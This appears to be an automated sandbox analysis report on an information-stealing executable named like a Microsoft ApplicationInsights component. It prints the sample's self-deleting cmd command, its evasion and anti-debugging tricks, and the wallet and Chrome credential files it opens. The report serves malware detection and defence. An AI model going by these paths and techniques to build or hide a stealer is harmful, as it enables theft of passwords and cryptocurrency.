Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040B0B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040B0B0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405740 2_2_00405740
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 5652 Thread sleep count: 42 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405740 2_2_00405740
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_00401000
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 2_2_00408820
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00407560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004011F0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408650
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00408410
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose, 2_2_00404DD0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00403C80 VirtualProtect ?,00000004,00000100,00000000,?,?,00000104 2_2_00403C80
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00405E20
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA, 2_2_00409850
Enables debug privileges
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0040ADE0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
.NET source code references suspicious native API functions
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036B2E13A8.cs Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/A9B2B86E.cs Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u00310F343D7.cs Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progman
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.dll VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,LocalFree, 2_2_00409930
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00410E40 GetLocalTime,SystemTimeToFileTime, 2_2_00410E40
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA, 2_2_00409850
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405840 memset,GetVersionExA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat, 2_2_00405840
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004097B0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 2_2_004097B0

Stealing of Sensitive Information:

barindex
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
